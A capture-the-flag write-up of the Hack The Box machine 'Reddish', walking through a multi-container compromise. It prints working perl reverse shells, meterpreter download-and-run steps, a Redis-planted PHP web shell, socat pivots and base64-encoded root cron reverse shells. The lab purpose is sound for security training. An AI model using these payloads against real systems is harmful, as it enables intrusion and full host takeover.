HTB{ Reddish }

Jan 26, 2019 | 22 minutes read

Tags: hack the box, node-red, socat, redis, rsync, docker, tunnels

Reddish was a really fun box for me. It was the first HTB box I did that delved into traffic manipulation. It was also the first 50 point box I did on HTB. I remember being very satisfied after completing Reddish. While going through the box, I was very impressed with the inter-container routing and how bending traffic through multiple ‘boxes’ was necessary to progress. Overall, I think the author yuntao did a fabulous job with this box.




As usual, we start off with a masscan followed by a targeted nmap.

masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL masscan.

open tcp 1880 1543784903
# end


There is only one port reported as open, and nmap reports that it’s running on Node.js.

nmap -p 1880 -sC -sV -oA nmap.

1880/tcp open  http    Node.js Express framework
|_http-title: Error


Seeing Node.js suggests there’s a webapp on port 1880, so we’ll run recursive-gobuster, a wrapper around gobuster that I recently wrote.

All scans complete. Cleaning up.

A Word on Automation

A common complaint about Reddish was that the author yuntao didn’t include any checkpoints from which we could resume work if the box reset or our connections were dropped. These kinds of concerns become a non-issue if we take some time to automate the steps that allow us to progress through the stages we’ve already completed. In that spirit, we’ll be taking some extra time to look at different methods that accomplish said automation.

If you would like to grab any of the scripts from this post, please feel free to do so at HTB Scripts for Retired Boxes - Reddish

Container One (aka nodered)

Browsing to any of the discovered directories results in the following message from the server.


However, sending a POST request gets us some different results.

curl -s -X POST


The path key has a value of /red/{id}, which suggests we should take the value associated with the id key and use it to form a URL.

Browsing to that URL brings us to an instance of Node-RED.



This is a great chance to automate generating this URL! The POST request returns JSON. It just so happens that there’s a great command line JSON parser called jq. We can use it to easily parse the JSON returned and generate the URL we need. We automate this step because the id value is not static, and may change.

Normal json parsing with jq, formatted output

curl -s -X POST | jq

  "id": "5539bd07f6673eb6d6509a2f367fbbb7",
  "ip": "::ffff:",
  "path": "/red/{id}"

Only select the id key and don’t include quotes

curl -s -X POST | jq --raw-output .id


Use command substitution to grab the id key and echo out the full dynamic URL

echo "/red/$(curl -s -X POST | jq --raw-output .id)"
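The same pipeline can be exercised locally against a canned response. The hostname below is a placeholder, not the box's address; the JSON stands in for the server's reply.

```shell
# Sample JSON standing in for the server's POST response
json='{"id":"5539bd07f6673eb6d6509a2f367fbbb7","path":"/red/{id}"}'

# Extract the id with jq, then build the dynamic URL ("target" is a placeholder)
id=$(echo "$json" | jq --raw-output .id)
echo "http://target:1880/red/${id}/"
```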


Node-RED Callbacks

According to the Node-RED website

Node-RED is a programming tool for wiring together hardware devices, APIs and online services in new and interesting ways. It provides a browser-based editor that makes it easy to wire together flows using the wide range of nodes in the palette that can be deployed to its runtime in a single-click.

That sounds neat… now how about some RCE?

After playing around with Node-RED, I think it’s safe to say that there are a lot of ways to get RCE through this interface. The interface is drag-and-drop and is fairly intuitive to use. In Node-RED terms, we drag nodes onto the canvas and link them together to create flows.

We’ll be taking a look at my initial method of getting a callback and then a more streamlined approach that automates the majority of steps for initial access.

Callback Method 1

The first shell on target relies on some simple enumeration of available tools and architecture, followed by a perl reverse shell.

First, we need a way to run simple commands, so we’ll set up a flow consisting of three nodes: inject -> exec -> debug. We’ll use this flow to determine what utilities exist on target for us to use.

Start by dragging and dropping the flow listed above and then double clicking the exec node. In the Command field, enter the command to run then click Done.


Click and drag the lines between the nodes as shown below. The two between the exec node and the debug node represent STDOUT and STDERR.


Once everything is set up, we need to click Deploy in the upper right-hand corner of the screen and then click the button on the left hand side of the inject node.



Click on the debug tab below the Deploy button to view the command’s results.


It looks like the target is fairly limited as far as tools go, but a perl callback is simple enough. As usual, we can use shellpop to quickly generate our perl command.

shellpop --payload linux/reverse/tcp/perl_1 --host --port 12345

[+] Execute this code in remote target: 

perl -e "use Socket;\$i='';\$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" 

Simply copy and paste the command above into the Command field of the exec node, set up a listener on kali, re-deploy the flow, and trigger the inject node. EZPZ.

nc -nvlp 12345

Ncat: Version 7.70 ( )
Ncat: Listening on :::12345
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# uname -a 
Linux nodered 4.4.0-130-generic #156-Ubuntu SMP Thu Jun 14 08:53:28 UTC 2018 x86_64 GNU/Linux

\o/ - root access (nodered)

Callback Method 2

For our second method, we’ll use a Node-RED flow to download a meterpreter payload to target and then execute it for us. We can use our exec flow from earlier to check the architecture of the box with a uname -a.

Linux nodered 4.4.0-130-generic #156-Ubuntu SMP Thu Jun 14 08:53:28 UTC 2018 x86_64 GNU/Linux

Knowing that it’s a 64-bit box, we can generate a meterpreter payload.

msfvenom -o meter-rev-tcp-12345 -f elf -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345

Having generated the meterpreter payload, we can jot down a quick perl one-liner to download the payload over HTTP.

perl -e 'use File::Fetch; File::Fetch->new(uri => "")->fetch();'

We can give this a shot locally to confirm it’s working by simply opening an ncat listener on port 80 and running the one-liner.

nc -nvlp 80

Ncat: Version 7.70 ( )
Ncat: Listening on :::80
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
GET /meter-rev-tcp-12345 HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic YW5vbnltb3VzOkZpbGUtRmV0Y2hAZXhhbXBsZS5jb20=
User-Agent: File::Fetch/0.52

Now that we know that works, let’s see about getting it working in Node-RED. We can use a similar layout to what we used for the perl callback: inject -> exec -> debug, and just string together a few shell commands to get the file downloaded onto target. Below you can see the commands we’ll be running.

mkdir -p /tmp/.stuff
cd /tmp/.stuff
perl -e 'use File::Fetch; File::Fetch->new(uri => "")->fetch();'
chmod +x /tmp/.stuff/meter-rev-tcp-12345


Fire up a netcat listener to confirm that our perl one-liner is working (again) by deploying the flow and clicking inject.

nc -nvlp 80

Ncat: Version 7.70 ( )
Ncat: Listening on :::80
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
GET /meter-rev-tcp-12345 HTTP/1.1
User-Agent: HTTP-Tiny/0.043

That confirms that at least some of our commands are working. Now we can get a meterpreter listener up and running to actually receive the callback on port 12345.


msf > use multi/handler
msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
lhost => tun0
msf exploit(multi/handler) > set lport 12345
lport => 12345
msf exploit(multi/handler) > exploit -j 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(multi/handler) >

We also need to serve up our meterpreter payload.

python3 -m http.server 80

Serving HTTP on port 80 ( ...

With the python web server and metasploit both listening, let’s hit inject and get a meterpreter shell.

Window 1
════════
 - - [24/Jan/2019 19:03:16] "GET /meter-rev-tcp-12345 HTTP/1.1" 200 -

Window 2
[*] Sending stage (861348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-01-24 19:03:18 -0600

Now we’re on target with a meterpreter shell, which is great, but this was more than a few steps to get to this point. Let’s see about automating this.

Automation: Callback Method 2

Let’s begin by exporting our flow to a file that we can easily use later on. Click the hamburger (three horizontal lines) in the upper right to trigger the dropdown menu, then go to export, and click on clipboard.


That will bring up the menu below where you can export the current node configuration to your clipboard.


We can then get it into a file for use later on.

cat > automation/meter-callback-12345.flow << EOF
[{"id":"cea62012.79d12","type":"inject","z":"e4f547ef.15841","name":"","topic":"","payload":"","payloadType":"date","repeat":"","crontab":"","once":false,"onceDelay":0.1,"x":400,"y":60,"wires":[["ad4617f5.81d8e8"]]},{"id":"ad4617f5.81d8e8","type":"exec","z":"e4f547ef.15841","command":"mkdir -p /tmp/.stuff && cd /tmp/.stuff && perl -e 'use File::Fetch; File::Fetch->new(uri => \"\")->fetch();' && chmod +x /tmp/.stuff/meter-rev-tcp-12345 && /tmp/.stuff/meter-rev-tcp-12345","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":730,"y":120,"wires":[["81161080.0297f"],["81161080.0297f"],[]]},{"id":"81161080.0297f","type":"debug","z":"e4f547ef.15841","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"false","x":390,"y":220,"wires":[]}]
EOF

With that done, we can create a resource file to automate the meterpreter listener setup (shown below).


use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 12345
exploit -j

Resource files can be used directly when starting msfconsole. This resource file will get our listener spun up without any additional interaction on our part.

The last piece of this is a janky bash script to glue it all together! We’ll assume this script is run out of the same folder that our earlier URL-generation script lives in.

You can find a more dynamic version at HTB Scripts for Retired Boxes; it allows you to specify a port instead of it being hardcoded.

 3  cat meter-callback-12345.flow | xclip -sel clipboard
 5  echo "Contents of meter-callback-12345.flow are in your clipboard"
 8  echo "Browse here and import from clipboard:"
12  xterm -e 'cd /tmp && python3 -m http.server 80' &
13  echo "HTTP listener started"
17  xterm -e 'cd /tmp && msfvenom -o meter-rev-tcp-12345 -f elf -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345'
18  echo "Meterpreter payload created"
21  msfconsole -r initial-meterpreter-setup.msf
  1. line 3: uses xclip to get the exported flow into your clipboard (i.e. just ctrl-v to get the contents)
  2. line 9: uses our earlier script to get the URL we need to browse to
  3. line 12: spawns a new terminal and gets our python listener started
  4. line 17: creates our payload
  5. line 21: starts msfconsole with our resource file

All that’s left after running this script is to go to the Node-RED interface and import the flow from your clipboard, deploy the flow, and hit inject.

If all went well, we’re now on target. A quick ls -al / shows us that we’re in a docker container.

ls -al /

total 76
drwxr-xr-x   1 root root 4096 Jul 15  2018 .
drwxr-xr-x   1 root root 4096 Jul 15  2018 ..
-rwxr-xr-x   1 root root    0 May  4  2018 .dockerenv
drwxr-xr-x   1 root root 4096 Jul 15  2018 bin
drwxr-xr-x   2 root root 4096 Jul 15  2018 boot

Also, we can examine /etc/hosts to know what the container calls itself.

cat /etc/hosts

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.18.0.2	nodered
172.19.0.2	nodered

nodered to Container Two (aka www)

Now that we’re in the nodered container, we need to enumerate. A quick ip addr will show us that this container has two interfaces.

ip addr

7: eth1@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:13:00:02 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth1
       valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever

Using the arp cache may or may not reveal the next target; a simple ping sweep will populate the entries if the cache is empty.
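A sweep can be as simple as backgrounded pings across the /24 (the 172.19.0.0/24 subnet here comes from the container's /etc/hosts entries; adjust to whatever your interfaces show).

```shell
# Generate candidate addresses for a /24, then ping each in the background;
# replies populate the ARP cache, which `ip neigh` can then read back
targets() { for i in $(seq 1 254); do echo "${1}.${i}"; done; }

for ip in $(targets 172.19.0); do
  (ping -c 1 -W 1 "$ip" >/dev/null 2>&1 && echo "$ip is up") &
done
wait
```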

ip neigh
════════
 dev eth1 lladdr 02:42:ac:13:00:04 REACHABLE
 dev eth0 lladdr 02:42:6c:e0:98:76 REACHABLE
 dev eth1 lladdr 02:42:ac:13:00:03 REACHABLE
 dev eth1 lladdr 02:42:06:2d:29:27 REACHABLE

Since we have a socks proxy running, we can use it coupled with proxychains to run nmap against the addresses we just discovered.

First, ensure proxychains.conf is configured correctly. There should be an entry at the bottom under ProxyList that specifies a socks4 proxy pointing at the one started by metasploit (port 1080 in our case).


# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 1080

The important parts here are the -sT to specify a Connect scan, and -Pn to skip nmap’s host discovery phase. nmap scanning through a socks proxy has limitations. Basically, you’re limited to TCP Connect scans. That’s an oversimplification, but accurate enough to press on with.

proxychains nmap -sT -Pn --open,3

ProxyChains-3.1 (
Starting Nmap 7.70 ( ) at 2019-01-25 16:54 CST
Nmap scan report for
Host is up (0.22s latency).
Not shown: 1 closed port
6379/tcp open  redis

Nmap scan report for
Host is up (0.076s latency).
Not shown: 1 closed port
80/tcp open  http

So, we have a web server and a redis instance. Let’s start with browsing to the web server.

Web Access

To make the process of browsing a bit simpler, we’ll set up a meterpreter route and a socks proxy we can use to connect from kali.

First, the route.

msf exploit(multi/handler) > use post/multi/manage/autoroute
msf post(multi/manage/autoroute) > set session 1
session => 1
msf post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module.
[*] Running module against
[*] Searching for subnets to autoroute.
[+] Route added to subnet from host's routing table.
[+] Route added to subnet from host's routing table.
[*] Post module execution completed
msf post(multi/manage/autoroute) > 

Next, the socks proxy.

msf post(multi/manage/autoroute) > use auxiliary/server/socks4a
msf auxiliary(server/socks4a) > exploit 
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server
msf auxiliary(server/socks4a) > 

Finally, we configure firefox to use the socks proxy and browse to the site. You can see my foxyproxy config below.


Browsing to, we see the default page below.


Automation: Web Access

Since we already have a resource file, we can actually just add these two actions into our resource file. Any time we have to reestablish our initial access, the socks proxy and routes will be ready and waiting automatically.

use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 12345
set autorunscript multi_console_command -r /root/htb/reddish/post-exploit-scripts.rc
exploit -j

The resource file uses multi_console_command to run multiple post-exploitation modules.


run post/multi/manage/autoroute
run auxiliary/server/socks4a

And here is what a callback looks like after adding the multi_console_command to our resource file.

[*] Sending stage (861348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-01-26 05:09:26 -0600
[*] Session ID 1 ( -> processing AutoRunScript 'multi_console_command -r /root/htb/reddish/post-exploit-scripts.rc'
[*] Running Command List ...
[*] 	Running command run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module.
[*] Running module against
[*] Searching for subnets to autoroute.
[+] Route added to subnet from host's routing table.
[+] Route added to subnet from host's routing table.
[*] 	Running command run auxiliary/server/socks4a
[*] Starting the socks4a proxy server

Redis RCE

When viewing the source of the web page, we can see the following interesting function.

function getData() {
    $.ajax({
        url: "8924d0549008565c554f8128cd11fda4/ajax.php?test=get hits",
        cache: false,
        dataType: "text",
        success: function (data) {
            console.log("Number of hits:", data)
        },
        error: function () {
            // snipped
        }
    });
}

There are some additional clues in the source file that suggest ajax.php is making calls to the Redis database instance.

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. … Depending on your use case, you can persist it either by dumping the dataset to disk every once in a while …

There is an excellent write-up about getting RCE on a Redis server here. The basic goal is to insert a file into the Redis server’s memory as part of the database, and later transfer it into a file by dumping the dataset to disk. The steps we’ll take are:

  1. Reset the server’s configured directory
  2. Describe where the database file (when dumped) lives on disk
  3. Write a simple php web shell and assign it to a Redis key
  4. Dump the database to disk
  5. Browse to the webshell for RCE (the command output is at the end of the line)
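Since each step is just a Redis command smuggled through the test parameter, the urlencoded values can be generated rather than typed by hand. This is a sketch using jq’s @uri filter; it encodes a little more aggressively than strictly necessary (slashes become %2F), which is still valid in a query string.

```shell
# Percent-encode a Redis command for use as the `test=` query value
enc() { printf '%s' "$1" | jq -sRr @uri; }

enc 'flushall'
enc 'config set dir /var/www/html'
enc 'config set dbfilename backdoor.php'
enc 'set cmd "<?php system($_GET['\''cmd'\'']); ?>"'
enc 'bgsave'
```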


Automation: Redis RCE

Manually performing the RCE steps is pretty tedious. We’ll use bash and curl to automate the process.


# fourth octet can change, pass it as arg1
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=flushall"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=config%20set%20dir%20/var/www/html"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=config%20set%20dbfilename%20backdoor.php"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=set%20cmd%20%22%3C?php%20system(\$_GET[%27cmd%27]);%20?%3E%22"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=bgsave"

Now, anytime we need to get our webshell uploaded, we can just run the script above with the fourth octet as an argument.

./curl-commands-for-php-shell-on-second-container 3

OKOKOKOKBackground saving started

Reverse Shell

A few which commands are enough to tell us that the Redis container suffers the same lack of tooling as the nodered container. Thankfully, it’s not terribly difficult to get a reverse perl callback working.

Start by uploading a statically compiled socat to the nodered container.

meterpreter > lcd /opt/static/x64
meterpreter > upload socat
[*] uploading  : socat -> socat
[*] Uploaded -1.00 B of 366.38 KiB (-0.0%): socat -> socat
[*] uploaded   : socat -> socat

Make it executable

meterpreter > shell
Process 46 created.
Channel 2422 created.
chmod +x socat

And create a listener on port 1111 that forwards all traffic it receives to kali on the same port.

./socat tcp-listen:1111,fork,reuseaddr tcp: &

Now we need our perl callback. Keep in mind that we’re calling back to our listener inside the nodered container; that same traffic will get passed on to kali via socat. We use urlencoding so that no characters break the URL parsing done by the browser.

shellpop --payload linux/reverse/tcp/perl_1 --host --port 1111 --urlencode

[+] Execute this code in remote target: 


Pass the generated payload as the argument to the test parameter.


nc -nvlp 1111

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

\o/ - access level: www-data (www)

For a quick sanity check, we’ll check /etc/hosts again.

cat /etc/hosts

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.19.0.3	www
172.20.0.3	www

www to Container Three (aka backup)

After some basic enumeration, we see that there is a /backup folder that contains an interesting file.


cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b
rsync -a *.rdb rsync://backup:873/src/rdb/
cd / && rm -rf /var/www/html/*
rsync -a rsync://backup:873/src/backup/ /var/www/html/
chown www-data. /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

A closer look into what may be running this script turns up the following cron entry. The script is being executed as root every 3 minutes.


*/3 * * * * root sh /backup/

If you’ve never checked out Unix Wildcards Gone Wild, it’s worth a read. rsync wildcarding is one of the examples in there. We COULD leverage this backup script to get user.txt or a root shell in this container. The basic idea: because the script uses a wildcard (*.rdb), we can pass arbitrary command line arguments to rsync by creating files whose names are the arguments we want to pass.
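To illustrate the primitive without touching the box, here’s the trick in isolation: a file whose name looks like an option gets swallowed by the *.rdb glob and handed to rsync as an argument. The directory and filenames below are made up for the demo.

```shell
# Any file matching *.rdb is expanded onto rsync's command line, so a file
# literally named "-e sh payload.rdb" arrives as an option, not a filename
demo=$(mktemp -d)
cd "$demo"
touch -- 'normal.rdb' '-e sh payload.rdb'

# What `rsync -a *.rdb ...` would actually see as its arguments:
printf '%s\n' *.rdb
```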

However, we’re going to skip this step and just circle back around for user.txt after rooting the host machine.

Replicating the Filesystem

The backup script tells us exactly how to pull a piece of the filesystem from backup into www. We can pull the root of that filesystem into www and examine it at our leisure (this shell may hang; if it does, ctrl+c and re-trigger your perl callback).

mkdir /tmp/stuff && rsync -a rsync://backup:873/src /tmp/stuff

skipping non-regular file "dev/agpgart"
skipping non-regular file "dev/autofs"
skipping non-regular file "dev/btrfs-control"

After that completes, we have a view of backup’s filesystem under /tmp/stuff.

ls -altr /tmp/stuff
total 100
-rwxr-xr-x  1 www-data www-data  100 May  4  2018
-rwxr-xr-x  1 www-data www-data    0 May  4  2018 .dockerenv

We can confirm a few assumptions made now that we have backup’s filesystem.

rsync is running as a service, using the configuration found in /etc/rsyncd.conf.

cat /


set -ex

service cron start

exec rsync --no-detach --daemon --config /etc/rsyncd.conf

rsync’s config says that it’s running as root and has the root of the filesystem (/) mapped to /src/. We also know from the config that we can write to the filesystem using the rsync service because of the setting read only = no.

cat /etc/rsyncd.conf

uid = root
gid = root
use chroot = no
max connections = 4
syslog facility = local5
pid file = /var/run/
log file = /var/log/rsyncd.log

path = /
comment = src path
read only = no

After poking around backup’s files (i.e. enumerating), we find another cronjob.


* * * * * root rm -rf /rdb/*

This one runs every minute, but isn’t terribly useful. However, because the rsync service allows us to write to as well as read from backup, we can actually add a new cronjob and have it executed on our behalf.

File Transfer via rsync

Let’s start by getting socat onto www. We’ll need socat to extend our reverse tunnel later on.

On kali, we’ll base64 encode the socat binary and copy it to the clipboard

base64 /opt/static/x64/socat | xclip -sel clipboard

Then, we’ll use a heredoc to easily paste it in our target window. The general steps for a heredoc are: execute the top line as a normal command (cat > socat.b64 << EOF), paste the contents of the clipboard, press return after the paste completes so that the cursor is on a line by itself, then type EOF and hit enter. Afterwards, a base64 encoded copy of socat will be sitting on the target machine.

cat > socat.b64 << EOF

The last thing to do is decode socat and make it executable

base64 -d socat.b64 > socat
chmod +x socat
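Before relying on the clipboard paste, it’s worth verifying the encode/decode round trip locally; /bin/ls stands in for the socat binary here.

```shell
# Encode a binary, decode it back, and compare byte-for-byte
work=$(mktemp -d)
base64 /bin/ls > "$work/bin.b64"          # what gets copied to the clipboard
base64 -d "$work/bin.b64" > "$work/bin"   # what the heredoc paste produces
cmp /bin/ls "$work/bin" && echo "round trip ok"
```

If cmp is silent and "round trip ok" prints, the transfer method is sound; any corruption usually means a stray character slipped into the paste.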

Let’s leave socat for now and come back to create the redirection a little later.

Reverse Shell

Let’s take a look at www’s interfaces and routes to make sure we have a firm grasp on how traffic is flowing.

We know that there is traffic between this container and the backup container and it’s happening every three minutes, so there should be a corresponding entry in the arp cache.

ip neigh
════════
 dev eth1 lladdr 02:42:ac:14:00:02 REACHABLE
 dev eth0 lladdr 02:42:ac:13:00:02 STALE
 dev eth0 lladdr 02:42:ac:13:00:04 DELAY

The REACHABLE entry on eth1 looks promising. Let’s check our eth1 interface to see where that container should callback to.

ip addr show eth1

15: eth1@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:14:00:03 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth1
       valid_lft forever preferred_lft forever

Now we know where the shell on backup needs to call back to.

Let’s create a local malicious cronjob that uses our same perl callback to get from backup to www.

First, we need our new payload

shellpop --payload linux/reverse/tcp/perl_1 --host --port 2222

[+] Execute this code in remote target: 

perl -e "use Socket;\$i='';\$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" 

Then, we’ll add it as a cronjob to a local file


* * * * * root perl -e "use Socket;\$i='';\$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};"

Now, to base64 encode it and copy it to our clipboard

base64 -w0 evil.cron | xclip -sel clipboard

Finally, get it onto target (www) and base64 decode it.

echo 'KiAqICogKiAqIHJvb3QgcGVybCAtZSAidXNlIFNvY2tldDtcJGk9JzE3Mi4yMC4wLjInO1wkcD0yMjIyO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oXCRwLGluZXRfYXRvbihcJGkpKSkpe29wZW4oU1RESU4sJz4mUycpO29wZW4oU1RET1VULCc+JlMnKTtvcGVuKFNUREVSUiwnPiZTJyk7ZXhlYygnL2Jpbi9zaCAtaScpO307Igo=' | base64 -d > evil.cron

Extending the Tunnel

After creating the malicious cron, we’ll also need to extend our socat tunnel so that a callback to www goes to nodered and then on to our kali machine, i.e. backup -> www:2222 -> nodered:2222 -> kali:2222

Recall that socat is already here; we just need to point any traffic it receives on port 2222 at nodered on port 2222.

www container

./socat tcp-listen:2222,fork,reuseaddr tcp: &

Now we have a listener on www that will send traffic to nodered:2222, but we also need to setup a similar listener on nodered to send the traffic along to kali.

nodered container

./socat tcp-listen:2222,fork,reuseaddr tcp: &

Finally, we need a netcat listener on kali


ncat -nvlp 2222

Adding the cronjob

Almost everything is in place; now we just need to push our cronjob over to the backup container and wait.

rsync evil.cron rsync://backup:873/src/etc/cron.d/unclean

Within a minute, we should see our netcat listener receive its callback!

Ncat: Version 7.70 ( )
Ncat: Listening on :::2222
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# id 
uid=0(root) gid=0(root) groups=0(root)

\o/ - root access (backup container)

Just like the others, we’ll look at /etc/hosts

cat /etc/hosts

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.20.0.2	backup

backup Container to the Host Machine

When looking to escape a container, a good thing to check for is whether or not the container was started with the --privileged flag. Running a container with the --privileged flag gives all capabilities to the container. It also grants access to the host’s devices (everything under the /dev folder). Since we’re root in the container, this allows us to mount the host’s filesystem.
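One quick (if rough) indicator is the effective capability mask in /proc/self/status: on a root shell inside a --privileged container the mask has essentially all bits set (e.g. something like 0000003fffffffff, the exact value varies by kernel), while an ordinary container shows a much smaller set. This heuristic is an assumption on my part, not output from the box.

```shell
# Inspect the effective capability bitmask for the current process;
# a (nearly) all-ones mask as root hints at a --privileged container
grep CapEff /proc/self/status
```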

A quick check of /dev confirms that we’re seeing host assets.

ls -al /dev

brw-rw----  1 root disk      8,   0 Jan 26 12:38 sda
brw-rw----  1 root disk      8,   1 Jan 26 12:38 sda1
brw-rw----  1 root disk      8,   2 Jan 26 12:38 sda2
brw-rw----  1 root disk      8,   3 Jan 26 12:38 sda3
brw-rw----  1 root disk      8,   4 Jan 26 12:38 sda4
brw-rw----  1 root disk      8,   5 Jan 26 12:38 sda5

We can mount the host’s filesystem with the following commands

mkdir /tmp/stuff
mount /dev/sda1 /tmp/stuff

Much like our cron callback from backup to www, we can use the same technique to call back directly from the host to kali for a full root shell.

Create another evil cronjob


* * * * * root perl -e "use Socket;\$i='';\$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};"

base64 encode the file and copy it

base64 -w0 anotherevil.cron | xclip -sel clipboard

Add the decoded cronjob to the host’s cron.d folder

echo 'KiAqICogKiAqIHJvb3QgcGVybCAtZSAidXNlIFNvY2tldDtcJGk9JzEwLjEwLjE0LjIyJztcJHA9MzMzMztzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKFwkcCxpbmV0X2F0b24oXCRpKSkpKXtvcGVuKFNURElOLCc+JlMnKTtvcGVuKFNURE9VVCwnPiZTJyk7b3BlbihTVERFUlIsJz4mUycpO2V4ZWMoJy9iaW4vc2ggLWknKTt9OyIK' | base64 -d > /tmp/stuff/etc/cron.d/rootshell

Then fire up netcat on kali

nc -nvlp 3333

Ncat: Version 7.70 ( )
Ncat: Listening on :::3333
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:a4:f7:9a brd ff:ff:ff:ff:ff:ff
    inet brd scope global ens33
       valid_lft forever preferred_lft forever

\o/ - root access (host machine)

Gathering Flags

Now, we can finally get around to gathering up those pesky flags.

# cat /root/root.txt
# cat /home/somaro/user.txt

I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.


Additional Resources

  1. recursive-gobuster
  2. HTB Scripts for Retired Boxes
  3. Metasploit resource files
  4. Redis Remote Command Execution
  5. Static Binaries
  6. Unix Wildcards Gone Wild
